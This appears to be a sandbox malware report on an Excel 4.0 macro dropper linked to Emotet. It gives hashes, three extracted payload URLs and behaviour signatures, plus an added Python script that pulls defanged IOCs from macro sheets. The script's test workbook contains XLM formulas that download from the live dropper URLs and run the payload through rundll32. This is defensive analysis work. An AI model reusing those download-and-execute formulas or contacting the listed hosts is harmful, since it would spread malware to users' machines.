General

  • Target

    42c5bb56d6d7939abf3f29c32648b0239c79d8362d5b7634e96c8387b4376831

  • Size

    83KB

  • Sample

    220114-jtajtsfcbk

  • MD5

    98f9e5ee47c74bad8a3d8abdbd55e0f2

  • SHA1

    3961997d2fdec003121adccce3afe8a45d7d2b42

  • SHA256

    42c5bb56d6d7939abf3f29c32648b0239c79d8362d5b7634e96c8387b4376831

  • SHA512

    4f0eef38fc9d601fdc5732cd0b066fa11d554282bb6f49e4e1c78a7509f800af8fc9417445ef86394594efe72f9559a762a28b6d2140dfe64805690cd8719263

Score
10/10

Malware Config

Extracted
  Language: xlm4.0
  Source:   xlm40.dropper
  URLs:
    http://moversphiladelphia.org/cmsxml/9ByFSxP/
    http://staging.mobettertech.com/assets/priWXQiXuU3JH/
    https://goldfinancenews.com/wp-includes/thCuZE5VAdTQ/

Extracted
  Language: xlm4.0
  Source:   xlm40.dropper
  URLs:
    http://moversphiladelphia.org/cmsxml/9ByFSxP/
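The extracted config above is the part of this report an analyst acts on: the xlm40.dropper URLs are where the XLM 4.0 macro fetches its payload, and the second extraction repeats the first URL, so any IOC list has to deduplicate. The following is an added example, not code from the report or from the sandbox vendor. It assumes an OOXML (.xlsm) container that stores Excel 4.0 macro code under xl/macrosheets/ (the report only says "xlm4.0" and does not state the container format), and it assumes the URLs appear as plain string literals in the formulas; the workbook it parses is constructed in-memory from the three report URLs, and the payload file name and CALL/EXEC formulas in it are made up for the example.

```python
"""Pull download URLs out of the Excel 4.0 (XLM) macro sheets of an OOXML
workbook and turn them into a deduplicated, defanged IOC list.

Added example, not code from the sandbox report. Assumptions: the dropper is
an OOXML (.xlsm) container with XLM 4.0 code under xl/macrosheets/ (the
report only says "xlm4.0", not the container format), and the URLs sit in
formulas as plain string literals. Droppers that split or encode their URLs
need an XLM emulator, not this regex.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit
from xml.sax.saxutils import escape

CT_NS = {"ct": "http://schemas.openxmlformats.org/package/2006/content-types"}
SSML_NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}
MACROSHEET_CT = "application/vnd.ms-excel.macrosheet+xml"
URL_RE = re.compile(r"https?://[^\s\"'<>(),;]+", re.IGNORECASE)


def macrosheet_parts(zf):
    """Zip members declared as XLM macro sheets in [Content_Types].xml."""
    types = ET.fromstring(zf.read("[Content_Types].xml"))
    return [ov.get("PartName").lstrip("/")
            for ov in types.findall("ct:Override", CT_NS)
            if ov.get("ContentType") == MACROSHEET_CT]


def formulas_in_sheet(xml_bytes):
    """Yield (cell, formula) for every cell of the sheet that carries an <f> element."""
    root = ET.fromstring(xml_bytes)
    for c in root.iterfind(".//m:sheetData/m:row/m:c", SSML_NS):
        f = c.find("m:f", SSML_NS)
        if f is not None and f.text:
            yield c.get("r"), f.text


def extract_urls(xlsm_bytes):
    """Ordered, deduplicated URLs found in the workbook's XLM formulas."""
    seen, urls = set(), []
    with zipfile.ZipFile(io.BytesIO(xlsm_bytes)) as zf:
        for part in macrosheet_parts(zf):
            for _cell, formula in formulas_in_sheet(zf.read(part)):
                for url in URL_RE.findall(formula):
                    if url not in seen:  # droppers retry the same host from several cells
                        seen.add(url)
                        urls.append(url)
    return urls


def to_iocs(urls):
    """(defanged URL, host, path) per URL: host for DNS/proxy blocks, path for hunting."""
    rows = []
    for url in urls:
        parts = urlsplit(url)
        host = parts.hostname or ""
        defanged = re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE)
        defanged = defanged.replace(host, host.replace(".", "[.]"), 1)
        rows.append((defanged, host, parts.path))
    return rows


# Constructed stand-in for the sample (not the real dropper): one XLM sheet whose
# formulas reference the three URLs from the report's extracted config; the first
# URL is repeated, as it is across the report's two extracted configs.
REPORT_URLS = [
    "http://moversphiladelphia.org/cmsxml/9ByFSxP/",
    "http://staging.mobettertech.com/assets/priWXQiXuU3JH/",
    "https://goldfinancenews.com/wp-includes/thCuZE5VAdTQ/",
]


def build_sample_xlsm():
    """Minimal .xlsm bytes: [Content_Types].xml plus one macro sheet (assumed layout)."""
    dl = '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"{}","..\\payload.dll",0,0)'
    cells = [dl.format(u) for u in REPORT_URLS + REPORT_URLS[:1]]
    cells.append('=EXEC("rundll32 ..\\payload.dll,DllRegisterServer")')  # no URL, ignored
    rows = "".join(
        f'<row r="{i}"><c r="A{i}"><f>{escape(c)}</f><v>0</v></c></row>'
        for i, c in enumerate(cells, start=1)
    )
    sheet = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
        'xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">'
        f"<sheetData>{rows}</sheetData></xm:macrosheet>"
    )
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Override PartName="/xl/workbook.xml" '
        'ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>'
        f'<Override PartName="/xl/macrosheets/sheet1.xml" ContentType="{MACROSHEET_CT}"/>'
        "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("xl/macrosheets/sheet1.xml", sheet)
    return buf.getvalue()


if __name__ == "__main__":
    for defanged, host, path in to_iocs(extract_urls(build_sample_xlsm())):
        print(f"{defanged}\t{host}\t{path}")
```

Run it on a real .xlsm by passing the file's bytes to extract_urls instead of build_sample_xlsm(). The rows keep host and path separate on purpose: paths under CMS directories such as /wp-includes/ usually belong to compromised legitimate sites, so blocking the full URL or path is safer than blocking the whole domain, and the path string is what you search for in proxy logs.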

Targets

    • Target

      42c5bb56d6d7939abf3f29c32648b0239c79d8362d5b7634e96c8387b4376831

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Loads dropped DLL

    • Drops file in System32 directory
